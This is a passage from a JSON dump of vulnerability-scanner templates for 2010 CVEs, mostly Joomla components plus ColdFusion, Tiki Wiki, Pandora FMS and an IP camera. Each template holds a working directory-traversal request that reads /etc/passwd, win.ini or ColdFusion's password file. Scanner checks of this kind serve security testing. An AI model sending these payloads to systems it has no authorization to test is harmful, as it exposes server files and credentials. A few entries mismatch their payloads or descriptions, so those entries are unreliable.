https://exchange.xforce.ibmcloud.com/vulnerabilities/59669\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-2507\n cwe-id: CWE-22\n epss-score: 0.01671\n epss-percentile: 0.87378\n cpe: cpe:2.3:a:masselink:com_picasa2gallery:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: masselink\n product: com_picasa2gallery\n tags: cve2010,cve,edb,packetstorm,joomla,lfi,masselink\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b399f4d9dc6b2c952a2ce9e388b0bc21714fffc806c4a6bb3f768981d57139d802206a1974d7ffcd57ea7f9084e535e8f10afddb089fec9a171050d073c28c510db6:922c64590222798bb761d5b6d8e72950", "hash": "3fc7410b2d026a4a3084c17a866b875c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ec2" }, "name": "CVE-2010-2680.yaml", "content": "id: CVE-2010-2680\n\ninfo:\n name: Joomla! Component jesectionfinder - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/14064\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2680\n - http://packetstormsecurity.org/1006-exploits/joomlajesectionfinder-lfi.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/59796\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-2680\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.80059\n cpe: cpe:2.3:a:harmistechnology:com_jesectionfinder:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: harmistechnology\n product: com_jesectionfinder\n tags: cve2010,cve,joomla,lfi,edb,packetstorm,harmistechnology\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022072b515f91c496b58e595115b0d084c1aef00d4c6ee17205d003acb4ab43c571302203b36bc9c01b393ef1b59fd113ab4455849196192ef1900eee38d59ce6a1a60a3:922c64590222798bb761d5b6d8e72950", "hash": "053d9a16b7a015a9ffccd87dfe4f9f4b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ec3" }, "name": "CVE-2010-2682.yaml", "content": "id: CVE-2010-2682\n\ninfo:\n name: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! website.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/14017\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2682\n - http://packetstormsecurity.org/1004-exploits/joomlarealtyna-lfi.txt\n - http://www.exploit-db.com/exploits/14017\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57647\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-2682\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.81565\n cpe: cpe:2.3:a:realtyna:com_realtyna:1.0.15:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: realtyna\n product: com_realtyna\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,realtyna\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402207d1d2f20ada527079788bebc1f7fb87e930823a6967b86b853d1b2d63ad60cc702203e9f6fa2c9063ccbb1dfe4f610e521bf0f622c6481c4b0cd4d1e44dd4dc57677:922c64590222798bb761d5b6d8e72950", "hash": "7d1e7e1dad4acef071a24e6a780e9e44", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ec4" }, "name": "CVE-2010-2857.yaml", "content": "id: CVE-2010-2857\n\ninfo:\n name: Joomla! Component Music Manager - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the cid parameter to album.html.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, sensitive data exposure, and remote code execution.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/14274\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2857\n - http://www.exploit-db.com/exploits/14274\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/60195\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-2857\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.81565\n cpe: cpe:2.3:a:danieljamesscott:com_music:0.1:-:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: danieljamesscott\n product: com_music\n tags: cve,cve2010,joomla,lfi,edb,danieljamesscott\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a9df18c9b0d35866ea9765eaa67e92c811c401ee47b98f0ed80b8b20d1e61999022100bf0763eb2da8ee0ea76eaa0be32e72d2298820a16dbe45c9d2318c35b5cb37de:922c64590222798bb761d5b6d8e72950", "hash": "845b97edf0fe2265b25a77e54baf629a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ec5" }, "name": "CVE-2010-2861.yaml", "content": "id: CVE-2010-2861\n\ninfo:\n name: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI\n author: pikpikcu\n severity: high\n description: Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.\n impact: |\n This vulnerability can lead to unauthorized access to sensitive information and potential compromise of the affected system.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861\n - http://www.adobe.com/support/security/bulletins/apsb10-18.html\n - http://securityreason.com/securityalert/8148\n - http://securityreason.com/securityalert/8137\n - http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-2861\n cwe-id: CWE-22\n epss-score: 0.97078\n epss-percentile: 0.99753\n cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: adobe\n product: coldfusion\n shodan-query: http.component:\"Adobe ColdFusion\"\n tags: cve,cve2010,adobe,kev,vulhub,coldfusion,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"rdspassword=\"\n - \"encrypted=\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100fb077ddbfc836210d14e4abbde779e3a4801cadf4c5e57973e1675ae37adab3002200a4dff0b074d16f33db367ba0f8a10fb0b418f6e9bf8cdd4f6036ec6db9d649a:922c64590222798bb761d5b6d8e72950", "hash": "d07e057ebbaef3a0a5c5aaef988beb92", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ec6" }, "name": "CVE-2010-2918.yaml", "content": "id: CVE-2010-2918\n\ninfo:\n name: Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion\n author: daffainfo\n severity: high\n description: A PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.\n impact: |\n Remote file inclusion vulnerability in Joomla! Component Visites 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/31708\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2918\n - https://www.exploit-db.com/exploits/14476\n - http://www.vupen.com/english/advisories/2010/1925\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/42025\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-2918\n cwe-id: CWE-94\n epss-score: 0.02847\n epss-percentile: 0.90478\n cpe: cpe:2.3:a:visocrea:com_joomla_visites:1.1:rc2:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: visocrea\n product: com_joomla_visites\n tags: cve,cve2010,joomla,lfi,edb,visocrea\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210081baa41c250dff048e922e0bd675a0f66fa65d828db6fd1c6cff4362145b014502207a01230528658a21273d20b9529a24d7cf4f605849cae7697de730852ff82435:922c64590222798bb761d5b6d8e72950", "hash": "451cf0888021cc00b9aa63f5c50a2c25", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ec7" }, "name": "CVE-2010-2920.yaml", "content": "id: CVE-2010-2920\n\ninfo:\n name: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12120\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2920\n - http://www.vupen.com/english/advisories/2010/1844\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57660\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-2920\n cwe-id: CWE-22\n epss-score: 0.03527\n epss-percentile: 0.90637\n cpe: cpe:2.3:a:foobla:com_foobla_suggestions:1.5.1.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: foobla\n product: com_foobla_suggestions\n tags: cve,cve2010,joomla,lfi,edb,foobla\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022036441deef54186effe4bc8c14c01564b3885f6058e30608ad2fe449e677c00a702205c4d8db4d4a05a86268c87cca7d2b6291aa83a4a825791567eefa258512efac9:922c64590222798bb761d5b6d8e72950", "hash": "c4595028cf81091c3bd09eaa6d9ff670", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ec8" }, "name": "CVE-2010-3203.yaml", "content": "id: CVE-2010-3203\n\ninfo:\n name: Joomla! Component PicSell 1.0 - Arbitrary File Retrieval\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to retrieve arbitrary files from the server.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/14845\n - https://nvd.nist.gov/vuln/detail/CVE-2010-3203\n - http://web.archive.org/web/20150105095919/http://secunia.com:80/advisories/41187/\n - http://www.exploit-db.com/exploits/14845\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-3203\n cwe-id: CWE-22\n epss-score: 0.00626\n epss-percentile: 0.76748\n cpe: cpe:2.3:a:xmlswf:com_picsell:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xmlswf\n product: com_picsell\n tags: cve,cve2010,edb,joomla,lfi,xmlswf\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022030007981511407dd6716097c70d2348b6e7f288e57d05a177e4f9ae0bcf607ef022100aa3436a7609d718ca4639083c1b39f8585519a8c27fd56f228a6af4a2cc3eedf:922c64590222798bb761d5b6d8e72950", "hash": "5dc4a19fc1403472156328ea11c869d7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ec9" }, "name": "CVE-2010-3426.yaml", "content": "id: CVE-2010-3426\n\ninfo:\n name: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/14964\n - https://nvd.nist.gov/vuln/detail/CVE-2010-3426\n - http://packetstormsecurity.org/1009-exploits/joomlajphone-lfi.txt\n - http://www.exploit-db.com/exploits/14964\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/61723\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-3426\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.81565\n cpe: cpe:2.3:a:4you-studio:com_jphone:1.0:alpha3:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: 4you-studio\n product: com_jphone\n tags: cve,cve2010,lfi,edb,packetstorm,joomla,4you-studio\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220368e2242aeae3d34942385d4007b77e7b65af8ff3b65d7e76ff47cfe4e9424d2022044deeec7dbd324f3233d3ce8caddb62b744042f40f60d4819692cd7d208f949b:922c64590222798bb761d5b6d8e72950", "hash": "9566b8805c78de0169810b759b1e7164", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eca" }, "name": "CVE-2010-4231.yaml", "content": "id: CVE-2010-4231\n\ninfo:\n name: Camtron CMNC-200 IP Camera - Directory Traversal\n author: daffainfo\n severity: high\n description: The CMNC-200 IP Camera has a built-in web server that is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.\n impact: |\n An attacker can exploit this vulnerability to access sensitive files and directories on the camera.\n remediation: Upgrade to a supported product version.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2010-4231\n - https://www.exploit-db.com/exploits/15505\n - https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt\n - http://www.exploit-db.com/exploits/15505/\n - https://github.com/K3ysTr0K3R/CVE-2010-4231-EXPLOIT\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N\n cvss-score: 7.8\n cve-id: CVE-2010-4231\n cwe-id: CWE-22\n epss-score: 0.01615\n epss-percentile: 0.87178\n cpe: cpe:2.3:a:camtron:cmnc-200_firmware:1.102a-008:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: camtron\n product: cmnc-200_firmware\n tags: cve,cve2010,iot,lfi,camera,edb,camtron\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/../../../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f3c7c9347f9d8a8e7b83098897aecc1fc6ca5594a43e83505cd43fdd025d6130022100832745cf9064f1897cb80f0caceac6dfa4b448f2bae9f8ca58b1b79ac602e833:922c64590222798bb761d5b6d8e72950", "hash": "0991ca33ed45c2d5bff1ddf116d337bb", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ecb" }, "name": "CVE-2010-4239.yaml", "content": "id: CVE-2010-4239\n\ninfo:\n name: Tiki Wiki CMS Groupware 5.2 - Local File Inclusion\n author: 0x_akoko\n severity: critical\n description: Tiki Wiki CMS Groupware 5.2 is susceptible to a local file inclusion vulnerability.\n impact: |\n The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation.\n remediation: |\n Upgrade Tiki Wiki CMS Groupware to a version that is not affected by the CVE-2010-4239 vulnerability.\n reference:\n - https://dl.packetstormsecurity.net/1009-exploits/tikiwiki52-lfi.txt\n - https://www.openwall.com/lists/oss-security/2010/11/22/9\n - https://security-tracker.debian.org/tracker/CVE-2010-4239\n - https://nvd.nist.gov/vuln/detail/CVE-2010-4239\n - https://access.redhat.com/security/cve/cve-2010-4239\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2010-4239\n cwe-id: CWE-20\n epss-score: 0.03038\n epss-percentile: 0.90751\n cpe: cpe:2.3:a:tiki:tikiwiki_cms\\/groupware:5.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: tiki\n product: tikiwiki_cms\\/groupware\n tags: cve,cve2010,tikiwiki,lfi,tiki\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini\"\n\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n# digest: 4a0a00473045022100b5b334a2fec00cf5a3aecc1339951bf57de03095d5f4265c23450b3a0c64bb5c02206338a21c9a89350f86820ccc9f08c7d37697834a200669fe085df7763d730318:922c64590222798bb761d5b6d8e72950", "hash": "62744ae76a959c8be559e19638a722ef", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ecc" }, "name": "CVE-2010-4282.yaml", "content": "id: CVE-2010-4282\n\ninfo:\n name: phpShowtime 2.0 - Directory Traversal\n author: daffainfo\n severity: high\n description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php.\n impact: |\n An attacker can exploit this vulnerability to access sensitive files containing confidential information, such as configuration files or user credentials.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/15643\n - https://nvd.nist.gov/vuln/detail/CVE-2010-4282\n - http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download\n - http://www.exploit-db.com/exploits/15643\n - http://seclists.org/fulldisclosure/2010/Nov/326\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-4282\n cwe-id: CWE-22\n epss-score: 0.01214\n epss-percentile: 0.83767\n cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: artica\n product: pandora_fms\n tags: cve,cve2010,seclists,phpshowtime,edb,lfi,joomla,artica\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402201b4cbfaddf215e4507727c41a0a0b2a5fe584d66891aa082d5d3e1c647a7bb3402202499125b034828944ede2fdfc1673a00684dbc3abdb877a5ef2baa1824041954:922c64590222798bb761d5b6d8e72950", "hash": "d534023f85859e7d1e343e49a162e44f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ecd" }, "name": "CVE-2010-4617.yaml", "content": "id: CVE-2010-4617\n\ninfo:\n name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/15791\n - https://nvd.nist.gov/vuln/detail/CVE-2010-4617\n - http://packetstormsecurity.org/files/view/96812/joomlajotloader-lfi.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/64223\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-4617\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.80104\n cpe: cpe:2.3:a:kanich:com_jotloader:2.2.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: kanich\n product: com_jotloader\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,kanich\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502204933fa3b4ca21398fbcd1ce68db7fa44c963d2d530bbafbe0405fc0e5112db32022100ab0c92e462dd2e49ea684140fb5a8d3ba7c9fa7b1a6f1f657c4b49adba8fc93c:922c64590222798bb761d5b6d8e72950", "hash": "35fe5ad7db1da39c15eab84e9594a87a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ece" }, "name": "CVE-2010-4719.yaml", "content": "id: CVE-2010-4719\n\ninfo:\n name: Joomla! Component JRadio - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to further compromise.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/15749\n - https://nvd.nist.gov/vuln/detail/CVE-2010-4719\n - http://packetstormsecurity.org/files/view/96751/joomlajradio-lfi.txt\n - http://www.exploit-db.com/exploits/15749\n - http://www.fxwebdesign.nl/index.php?option=com_content&view=article&id=20&Itemid=56\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-4719\n cwe-id: CWE-22\n epss-score: 0.04503\n epss-percentile: 0.92278\n cpe: cpe:2.3:a:fxwebdesign:com_jradio:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: fxwebdesign\n product: com_jradio\n tags: cve2010,cve,joomla,lfi,edb,packetstorm,fxwebdesign\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502207f173747822e13f460537c9f352c220b09c207c8d434d6851187c72c919607d9022100b83c290b935b1c2ab7d8803f7fba050894f359981c55eebe2e7b320f92dc2edd:922c64590222798bb761d5b6d8e72950", "hash": "cf6a7e5c7fb83240596ec24ae7c46fcf", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ecf" }, "name": "CVE-2010-4769.yaml", "content": "id: CVE-2010-4769\n\ninfo:\n name: Joomla! Component Jimtawl 1.0.2 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly unspecified other impacts via a .. (dot dot) in the task parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/15585\n - https://nvd.nist.gov/vuln/detail/CVE-2010-4769\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-4769\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.80059\n cpe: cpe:2.3:a:janguo:com_jimtawl:1.0.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: janguo\n product: com_jimtawl\n tags: cve,cve2010,joomla,lfi,edb,janguo\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220021f9becb5c0bae1d43b564ebe8c9145f4eba9fc6c340cc21ec9fe385112ccc1022100dfaf431bb69d21f56a3e2881f2da3e15463fe22ee8c1337c9b21d31f46994653:922c64590222798bb761d5b6d8e72950", "hash": "1f9c553e34b34577d5d5f38859a2c49b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ed0" }, "name": "CVE-2010-4977.yaml", "content": "id: CVE-2010-4977\n\ninfo:\n name: Joomla! Component Canteen 1.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/34250\n - https://nvd.nist.gov/vuln/detail/CVE-2010-4977\n - http://www.salvatorefresta.net/files/adv/Canteen%20Joomla%20Component%201.0%20Multiple%20Remote%20Vulnerabilities-04072010.txt\n - http://packetstormsecurity.org/1007-exploits/joomlacanteen-lfisql.txt\n - http://securityreason.com/securityalert/8495\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-4977\n cwe-id: CWE-89\n epss-score: 0.0016\n epss-percentile: 0.51628\n cpe: cpe:2.3:a:miniwork:com_canteen:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: miniwork\n product: com_canteen\n tags: cve2010,cve,joomla,lfi,edb,packetstorm,miniwork,sqli\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 